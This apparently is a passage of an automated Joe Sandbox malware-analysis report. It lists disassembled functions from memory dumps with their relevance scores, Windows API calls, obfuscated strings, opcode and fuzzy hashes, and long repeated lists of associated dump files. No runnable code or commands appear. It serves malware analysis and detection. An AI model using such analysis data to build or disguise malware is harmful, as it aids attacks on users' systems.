Associated: 00000000.00000002.2237618473.00000000005AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237922274.00000000005AC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238075304.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238097881.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_file.jbxd

Yara matches

Similarity

API ID:
String ID: !$!}$&;z$O@LU$y^_
API String ID: 0-2077237912
Opcode ID: cca173145c96561884dd303aadebbb2405a307a5ebdc70c782992c6c9b992e60
Instruction ID: 446342d79e0c7501721bd71346d4ed8fe7b8629d15f9dbc9b670d70e7972bf0e
Opcode Fuzzy Hash: cca173145c96561884dd303aadebbb2405a307a5ebdc70c782992c6c9b992e60
Instruction Fuzzy Hash: 46B209F3A086049FE304AE2DEC8567AFBE5EF94720F16493DEAC4C3744E63598058697

Function 000B8EA0 Relevance: 6.1, APIs: 4, Instructions: 58encryptionCOMMON

Download Yara Rule

APIs

CryptBinaryToStringA.CRYPT32(00000000,000A5184,40000001,00000000,00000000,?,000A5184), ref: 000B8EC0

Memory Dump Source

Source File: 00000000.00000002.2237128850.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.2237106103.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000000FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000125000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000128000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000012F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000132000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000151000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000018F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000245000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000265000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000026B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000573000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000595000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000005AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237922274.00000000005AC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238075304.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238097881.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_file.jbxd

Yara matches

Similarity

API ID: BinaryCryptString
String ID:
API String ID: 80407269-0
Opcode ID: 2e10e9893858c5bc1c87cb1b65d5c0fa5afdc8e086403c7c3cad81d827f6bda4
Instruction ID: 7b7f3b45046e1323f7ef16222c37367a8803b3f6bbfc943b862a3f9d33e21c2f
Opcode Fuzzy Hash: 2e10e9893858c5bc1c87cb1b65d5c0fa5afdc8e086403c7c3cad81d827f6bda4
Instruction Fuzzy Hash: 32110370200209AFDB40CF64E888FBA37AEAF8A300F10D458F9198B260DB35E841DB60

Function 6C696CF0 Relevance: 4.7, APIs: 3, Instructions: 231COMMON

Download Yara Rule

APIs

InitializeConditionVariable.KERNEL32(?), ref: 6C696D45
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C696E1E

Memory Dump Source

Source File: 00000000.00000002.2269025321.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2269004595.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2269088046.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2269110628.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2269129071.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: ConditionExclusiveInitializeLockReleaseVariable
String ID:
API String ID: 4169067295-0
Opcode ID: ba068df2cbb1ff551d94e21bc760f8014598e75bcf2a8839709e9f76211d8ed1
Instruction ID: cef72b3a95c0d67210e09b72d9d8342b2118f061bfe39851605f90312853d60d
Opcode Fuzzy Hash: ba068df2cbb1ff551d94e21bc760f8014598e75bcf2a8839709e9f76211d8ed1
Instruction Fuzzy Hash: 2BA17E706183818FC755CF25C490BAEFBE2BF89308F44495DE48A87751DB70E949CB96

Function 000B3720 Relevance: 4.6, APIs: 3, Instructions: 100comCOMMON

Download Yara Rule

APIs

CoCreateInstance.COMBASE(000BE118,00000000,00000001,000BE108,00000000), ref: 000B3758
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 000B37B0

Memory Dump Source

Source File: 00000000.00000002.2237128850.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.2237106103.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000000FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000125000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000128000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000012F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000132000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000151000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000018F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000245000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000265000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000026B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000573000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000595000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000005AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237922274.00000000005AC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238075304.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238097881.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_file.jbxd

Yara matches

Similarity

API ID: ByteCharCreateInstanceMultiWide
String ID:
API String ID: 123533781-0
Opcode ID: cb4bcc56fd18b880ffe85d016a1d64db75611986cb926346e9e2174ea17eccc0
Instruction ID: ba1c5c1f64ce75d3a03bd5657f7adeb0ccbf57955e07d078ce90d0d1d34247bf
Opcode Fuzzy Hash: cb4bcc56fd18b880ffe85d016a1d64db75611986cb926346e9e2174ea17eccc0
Instruction Fuzzy Hash: 18411870A40A289FDB24DB58CC94BDBB7B4BB48302F5041D8E608EB2D0D771AE85CF50

Function 00477EE3 Relevance: 2.5, Strings: 1, Instructions: 1214COMMON

Download Yara Rule

Strings

a#=^, xrefs: 004782CC

Memory Dump Source

Source File: 00000000.00000002.2237618473.00000000002FE000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.2237106103.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000000A1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000000FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000125000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000128000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000012F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000132000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000151000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000018F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000245000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000265000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000026B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000573000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000595000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000005AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237922274.00000000005AC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238075304.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238097881.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_file.jbxd

Yara matches

Similarity

API ID:
String ID: a#=^
API String ID: 0-2129560462
Opcode ID: fedf34d4981774f2aabd52465447112d6fe1fedbb12473e8d19f62a4cf5609a5
Instruction ID: 78b07ac5f10ca0b7499bdd808a20024ee49bde45d920f595e90e551bbce88138
Opcode Fuzzy Hash: fedf34d4981774f2aabd52465447112d6fe1fedbb12473e8d19f62a4cf5609a5
Instruction Fuzzy Hash: 108219B350C2149FD304AE2DEC8567AFBE5EF94720F1A892DEAC4C3744EA3598058797

Function 6C695C10 Relevance: 1.6, APIs: 1, Instructions: 333COMMON

Download Yara Rule

APIs

memcmp.VCRUNTIME140(?,?,6C664A63,?,?), ref: 6C695F06

Memory Dump Source

Source File: 00000000.00000002.2269025321.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2269004595.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2269088046.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2269110628.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2269129071.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: memcmp
String ID:
API String ID: 1475443563-0
Opcode ID: 1913865122f404812779f936fc1b3168496d64710720d4fcf55dc420e8726b74
Instruction ID: 4e78ddb84189f0b869c18d016eff578674f1ff09ffa21a39c9186e2f069ba6a1
Opcode Fuzzy Hash: 1913865122f404812779f936fc1b3168496d64710720d4fcf55dc420e8726b74
Instruction Fuzzy Hash: 5FC1C275D0120A8BCB04CFA5D5906EEBBF2FF8A319F28425DD8556BB44D732A806CF94

Function 0043CAE0 Relevance: 1.5, Strings: 1, Instructions: 208COMMON

Download Yara Rule

Strings

?F], xrefs: 0043CCD4

Memory Dump Source

Source File: 00000000.00000002.2237618473.00000000002FE000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.2237106103.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000000A1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000000FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000125000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000128000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000012F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000132000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000151000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000018F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000245000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000265000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000026B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000573000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000595000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000005AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237922274.00000000005AC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238075304.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238097881.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_file.jbxd

Yara matches

Similarity

API ID:
String ID: ?F]
API String ID: 0-2549263565
Opcode ID: e2ff33c6effa8b312d7c735e93604845011dbe79462e8e06f67b8c8d4b75dedb
Instruction ID: 9bddff51b79d4fb2134350e19e8386bd35cab30c4f44236b624a01a43602217e
Opcode Fuzzy Hash: e2ff33c6effa8b312d7c735e93604845011dbe79462e8e06f67b8c8d4b75dedb
Instruction Fuzzy Hash: C85166F3A193189BE304BA7CDC99336778ADB80320F2A823DAB54C7788FD7849054285

Function 003E392C Relevance: 1.4, Strings: 1, Instructions: 178COMMON

Download Yara Rule

Strings

puVR, xrefs: 003E3A23

Memory Dump Source

Source File: 00000000.00000002.2237618473.00000000002FE000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.2237106103.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000000A1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000000FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000125000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000128000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000012F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000132000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000151000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000018F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000245000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000265000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000026B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000573000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000595000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000005AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237922274.00000000005AC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238075304.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238097881.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_file.jbxd

Yara matches

Similarity

API ID:
String ID: puVR
API String ID: 0-1908743985
Opcode ID: ce4b5db097771df619055cacc9c6102e5d5ffbdc39e4b3c0df95171107fd114e
Instruction ID: 13002b064e157f2ca4be6dbb236ed65585abd3afa927db9d4f551fe094285812
Opcode Fuzzy Hash: ce4b5db097771df619055cacc9c6102e5d5ffbdc39e4b3c0df95171107fd114e
Instruction Fuzzy Hash: 89512BF3A092005BF3046D2EDC847BAB7EADBD4330F2B863ED694C3B94E97948058556

Function 00328810 Relevance: 1.4, Strings: 1, Instructions: 161COMMON

Download Yara Rule

Strings

'w, xrefs: 00328873

Memory Dump Source

Source File: 00000000.00000002.2237618473.00000000002FE000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.2237106103.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000000A1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000000FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000125000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000128000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000012F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000132000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000151000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000018F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000245000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000265000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000026B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000573000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000595000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000005AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237922274.00000000005AC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238075304.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238097881.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_file.jbxd

Yara matches

Similarity

API ID:
String ID: 'w
API String ID: 0-3813603451
Opcode ID: 31366d945c617252cfd0b724745e2704048845d9a1db7d57776c5c604ead22b7
Instruction ID: 0e2ce3f302d8fa498b3c98c7816cb519f995f30bbd9d6d229aa02956a8b5fc16
Opcode Fuzzy Hash: 31366d945c617252cfd0b724745e2704048845d9a1db7d57776c5c604ead22b7
Instruction Fuzzy Hash: 9B51D6F2A081105FF308AE2CEC8676AB7D6DB94310F1A853DDAC897788E9795C058787

Function 003CB9C7 Relevance: 1.4, Strings: 1, Instructions: 150COMMON

Download Yara Rule

Strings

W~k, xrefs: 003CBA38

Memory Dump Source

Source File: 00000000.00000002.2237618473.00000000002FE000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.2237106103.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000000A1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000000FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000125000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000128000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000012F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000132000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000151000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000018F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000245000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000265000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000026B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000573000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000595000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000005AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237922274.00000000005AC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238075304.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238097881.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_file.jbxd

Yara matches

Similarity

API ID:
String ID: W~k
API String ID: 0-2203690175
Opcode ID: 223d31c60594e3a1e6b013ec03cc5f71da643ae73554ffae697bd649752d70a7
Instruction ID: c44ca7c5ff8c819501883d47919c00263e72e77dfc2cb224da482303486876f3
Opcode Fuzzy Hash: 223d31c60594e3a1e6b013ec03cc5f71da643ae73554ffae697bd649752d70a7
Instruction Fuzzy Hash: 704138F390C2045FE304AE2AEC8176AF7DAEFE4310F1B853DE6D493344E93558018296

Function 004493C4 Relevance: 1.4, Strings: 1, Instructions: 109COMMON

Download Yara Rule

Strings

|I4m, xrefs: 0044946B

Memory Dump Source

Source File: 00000000.00000002.2237618473.00000000002FE000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.2237106103.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000000A1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000000FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000125000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000128000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000012F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000132000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000151000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000018F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000245000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000265000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000026B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000573000.00000040.00000001.01000000.00000003.sdmpDownload File
